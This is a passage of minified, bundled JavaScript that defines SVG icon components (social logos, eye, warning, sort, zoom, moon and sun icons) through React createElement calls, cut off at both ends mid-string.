3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"})),skype_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 3c-.415 0-.823.028-1.223.082a5.5 5.5 0 0 0-7.695 7.695 9 9 0 0 0 10.14 10.14 5.5 5.5 0 0 0 7.695-7.695A9 9 0 0 0 12 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 10c0-1-1-2-3-2s-3 1-3 2c0 2.5 6 1.5 6 4 0 1-1 2-3 2s-3-1-3-2"})),smile_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8.5V10m7-1.5V10m-8.271 4a5.002 5.002 0 0 0 9.542 0"})),social_community_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.632 5.032a8.446 8.446 0 0 1 5.79 8.024 8.5 8.5 0 0 1-.18 1.74M9.368 5.031a8.446 8.446 0 0 0-5.79 8.024c.001.596.063 1.178.18 1.74m13.915 4.5c.458.387 1.05.62 1.695.62A2.635 2.635 0 0 0 22 17.279a2.635 2.635 0 0 0-2.632-2.64 2.635 2.635 0 0 0-2.631 2.64c0 .81.364 1.534.936 2.018Zm0 0A8.378 8.378 0 0 1 12 21.5a8.378 8.378 0 0 1-5.673-2.204m0 0a2.636 2.636 0 0 0 .936-2.018 2.635 2.635 0 0 0-2.631-2.64A2.635 2.635 0 0 0 2 17.279a2.635 2.635 0 0 0 2.632 2.639c.645 0 1.237-.234 1.695-.62ZM14.632 5.14A2.635 2.635 0 0 1 12 7.778a2.635 2.635 0 0 1-2.632-2.64A2.635 2.635 0 0 1 12 2.5a2.635 2.635 0 0 1 2.632 2.639Z"})),square_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"})),star_rating_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.579",d:"M11.016 3.125c.387-.833 1.58-.833 1.968 0l2.136 4.602c.158.34.482.573.856.617l5.067.597c.918.108 1.286 1.233.608 1.856l-3.748 3.444a1.07 1.07 0 0 0-.326.998l.994 4.974c.18.9-.785 1.595-1.592 1.147l-4.45-2.475a1.09 1.09 0 0 0-1.059 0L7.02 21.36c-.806.448-1.771-.247-1.591-1.147l.994-4.974a1.07 1.07 0 0 0-.326-.998l-3.749-3.444c-.677-.623-.309-1.748.609-1.856l5.067-.597c.374-.044.698-.278.856-.617l2.136-4.602Z"})),stopwatch_reading_time_timer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 13a9 9 0 1 1-18 0 9 9 0 0 1 18 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 7.5V13l3.5 2.5M12 4V1.5m-2 0h4M21 6l-2-2"})),tablet_ipad_pad_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6 3h.01"})),tag_bookmark_save_favourite_mark_discount_sale_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 4v18l6.8-5.1a2 2 0 0 1 2.4 0L20 22V4a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2Z"})),tiktok_logo_icon_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),tiktok_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),triangle_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997Z"})),triangle_shape_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20 12 3l10 17H2Z"})),twitter_x_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),upload_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 21v-8m0 0-2.5 2.5M12 13l2.5 2.5"})),view_count_show_visible_eye_open_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a5 5 0 1 0 0-10 5 5 0 0 0 0 10Z"})),view_count_show_visible_eye_open_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a3 3 0 1 0 0-6 3 3 0 0 0 0 6Z"})),view_count_show_visible_eye_open_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12c6-8.667 16-8.667 22 0-6 8.667-16 8.667-22 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 12a6 6 0 1 1-12 0 6 6 0 0 1 12 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 12a3 3 0 0 0-3-3"})),view_count_show_visible_eye_open_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 9c-1.996-3.913-6-6-10-6S3.996 5.087 2 9"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21a7 7 0 0 0 6.308-10.038 2.5 2.5 0 1 1-3.27-3.27A7 7 0 1 0 12 21Z"})),view_count_show_visible_eye_open_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 17a5 5 0 0 0 5-5h-5V7a5 5 0 0 0 0 10Z"})),warning_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12s4.477 10 10 10Zm0-14v4.5m0 3v.5"})),warning_triangle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997ZM12 9v4.5m0 3v.5"})),whatsapp_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.806 14.02c-.849-.282-1.532-.824-1.768-1.06-.236-.235-.778-.919-1.06-1.767l1.202-1.91L9.553 5.96c-.943 0-3.04.778-3.323 3.323-.283 2.546 1.532 5.068 2.475 6.01.942.944 3.464 2.759 6.01 2.476 2.546-.283 3.323-2.381 3.323-3.324l-3.323-1.626-1.91 1.202Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10a9.953 9.953 0 0 1-5.183-1.446L2 22l1.445-4.818A9.953 9.953 0 0 1 2 12C2 6.477 6.477 2 12 2Z"})),wordpress_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 7.454H3.818"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Zm-6.137 9.318 5.228-13.636m-3.864 9.772-4.09-10m-3.41 0 5.455 13.864"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.117 17.322 6.09 7.454H3.223m-.303.605 5.217 13.26"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.045 7.454h5M8.59 21.318l3.183-8.409M19.5 5.41h-.334a2.273 2.273 0 0 0-2.123 3.083l1.775 4.643"})),youtube_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10 15V9l5 3-5 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.193 4.352c-3.627-.47-10.402-.47-14.213.004-1.456.18-2.57 1.446-2.757 3.168-.297 2.719-.297 6.233 0 8.952.188 1.722 1.301 2.988 2.757 3.168 3.811.473 10.586.475 14.213.004 1.36-.177 2.375-1.365 2.562-2.972.327-2.811.327-6.541 0-9.352-.187-1.607-1.202-2.795-2.562-2.972Z"})),full_screen_corners_out_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.5V5C3 3.89543 3.89543 3 5 3H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 15.5V19C3 20.1046 3.89543 21 5 21H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 8V5C21 3.89543 20.1046 3 19 3H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 15.5V19C21 20.1046 20.1046 21 19 21H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_in_magnifying_glass_plus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10.995 8V14M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_out_magnifying_glass_minus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plugin_connect_socket_integration_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21.5 2.5L18.5 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18 12.9999L20.5858 10.4142C21.3668 9.63311 21.3668 8.36678 20.5858 7.58573L16.4142 3.41416C15.6332 2.63311 14.3668 2.63311 13.5858 3.41416L11 5.99994",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5.9997 11L3.41391 13.5858C2.63286 14.3668 2.63286 15.6332 3.41391 16.4142L7.58549 20.5858C8.36653 21.3668 9.63286 21.3668 10.4139 20.5858L12.9997 18",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M2.5 21.5L5.5 18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4.5 9.5L14.5 19.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9.5 4.5L19.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M7 12L9.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 17L14.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),rocket_fly_boost_launch_pro_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M20.8991 2.5H21.5V3.10086C21.5 6.28346 19.7357 9.83572 17.4853 12.0862L13.5714 16L8 10.4286L11.9139 6.51473C14.1643 4.26429 17.7165 2.5 20.8991 2.5Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18.5 11L19 17L15 21L13.5 16",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 10.5L3 9L7 5L13 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9 15L3.5 20.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M11.5 17.5L9 20",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.5 12.5L4 15",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.4902 6.5H17.5002",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),gallery_indicator_image_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 5C3 3.89543 3.89543 3 5 3H19C20.1046 3 21 3.89543 21 5V13C21 14.1046 20.1046 15 19 15H5C3.89543 15 3 14.1046 3 13V5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M21.0002 12.6716L19.4144 11.0858C18.6333 10.3047 17.367 10.3047 16.5859 11.0858L15.9144 11.7574C15.1333 12.5384 13.867 12.5384 13.0859 11.7574L10.4144 9.08579C9.63332 8.30474 8.36699 8.30474 7.58594 9.08579L3.33594 13.3358",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M16.25 7C16.25 7.82843 15.5784 8.5 14.75 8.5C13.9216 8.5 13.25 7.82843 13.25 7C13.25 6.17157 13.9216 5.5 14.75 5.5C15.5784 5.5 16.25 6.17157 16.25 7Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M3 18.5C3 17.9477 3.44772 17.5 4 17.5H6.25C6.80228 17.5 7.25 17.9477 7.25 18.5V20C7.25 20.5523 6.80228 21 6.25 21H4C3.44772 21 3 20.5523 3 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M10 18.5C10 17.9477 10.4477 17.5 11 17.5H13.25C13.8023 17.5 14.25 17.9477 14.25 18.5V20C14.25 20.5523 13.8023 21 13.25 21H11C10.4477 21 10 20.5523 10 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M17 18.5C17 17.9477 17.4477 17.5 18 17.5H20C20.5523 17.5 21 17.9477 21 18.5V20C21 20.5523 20.5523 21 20 21H18C17.4477 21 17 20.5523 17 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"})),unlocked_open_security_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 12C4 10.8954 4.89543 10 6 10H18C19.1046 10 20 10.8954 20 12V20C20 21.1046 19.1046 22 18 22H6C4.89543 22 4 21.1046 4 20V12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 10V7C17 4.23858 14.7615 2 12 2C10.1493 2 8.53347 3.0055 7.66895 4.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 15.5L12 16.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),unlink_link_break_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M14.0113 17.0281L11.4972 19.5421C9.55336 21.486 6.40175 21.486 4.45789 19.5421C2.51404 17.5983 2.51404 14.4467 4.45789 12.5028L6.97193 9.98877M9.98875 6.97192L12.5028 4.45789C14.4466 2.51404 17.5983 2.51404 19.5421 4.45789C21.486 6.40174 21.486 9.55334 19.5421 11.4972L17.0281 14.0112",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M9.5 14.5L14.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 5L19 21",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plus_circle_zoom_in_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 7V12.0001M12 12.0001V17M12 12.0001H17M12 12.0001H7",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_descending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 6.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 12.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 14.5V5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 9.5L17 5.5L21 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_ascending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 5.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 17.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 11.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 9.5V18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 14.5L17 18.5L21 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),right_circle_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 12.5L10.5 15L16 9",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),subtract:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}))}},5404:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.moon=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,a.createElement)("path",{d:"M22 14.27A10.14 10.14 0 1 1 9.73 2 8.84 8.84 0 0 0 22 14.27Z"})),r.moon_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.17 4.53A9.54 9.54 0 0 0 19.5 15.69a8.26 8.26 0 0 1-7.76 4.29 8.36 8.36 0 0 1-7.71-7.7 8.23 8.23 0 0 1 4.15-7.76m1-2.52c-.16 0-.32.03-.48.09a10.28 10.28 0 0 0 3.56 19.9c4.47 0 8.27-2.85 9.67-6.84a1.36 1.36 0 0 0-1.27-1.82c-.15 0-.31.03-.47.1a7.48 7.48 0 0 1-3.41.43 7.59 7.59 0 0 1-6.33-10.04A1.36 1.36 0 0 0 9.17 2Z"})),r.sun=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M12 18.36a6.36 6.36 0 1 0 0-12.72 6.36 6.36 0 0 0 0 12.72ZM12.98.96V2.8c0 .53-.43.95-.97.95h-.02a.96.96 0 0 1-.97-.95V.96c0-.53.43-.96.96-.96h.05c.53 0 .96.43.96.96ZM4.89 3.5l1.3 1.3c.38.38.37.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.37 0l-1.3-1.3a.96.96 0 0 1 0-1.35l.04-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .95.43.95.97v.02c0 .53-.42.97-.95.97H.96a.95.95 0 0 1-.96-.96v-.05c0-.53.43-.96.96-.96ZM3.5 19.11l1.3-1.3a.96.96 0 0 1 1.36 0v.01l.02.01c.38.38.39.99 0 1.37l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.04a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.95.97-.95h.02c.53 0 .97.42.97.95v1.84c0 .53-.43.96-.96.96h-.05a.95.95 0 0 1-.96-.96ZM19.11 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.37 0l1.3 1.3c.38.37.38.98 0 1.35l-.04.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.95-.97v-.02c0-.53.42-.97.95-.97h1.84c.53 0 .96.43.96.96v.05c0 .53-.43.96-.96.96ZM20.5 4.89l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1 